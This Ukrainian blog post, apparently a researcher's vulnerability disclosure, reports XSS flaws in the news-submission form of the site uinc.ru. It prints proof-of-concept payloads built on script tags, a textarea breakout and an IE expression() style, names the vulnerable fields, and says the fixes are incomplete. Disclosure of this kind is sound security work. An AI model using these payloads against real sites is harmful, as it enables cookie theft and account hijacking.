Уразливості на www.uinc.ru
19:27 01.02.200829.08.2007
У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливості на секюріті проекті http://www.uinc.ru (Underground InformatioN Center). Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
01.02.2008
XSS:
POST запит на сторінці http://www.uinc.ru/news/sendnews.php:
"><script>alert(document.cookie)</script>
В полях: Тема, Ваше имя, Ваш E-mail.
</textarea><script>alert(document.cookie)</script>
В полі: Ваше сообщение.
Дані уразливості вже виправлені, але неякісно. При невеликій модифікації коду три з чотирьох XSS знову працюють.
XSS:
POST запит на сторінці http://www.uinc.ru/news/sendnews.php (IE):
" style="xss:expression(alert(document.cookie))
В полях: Тема, Ваше имя, Ваш E-mail.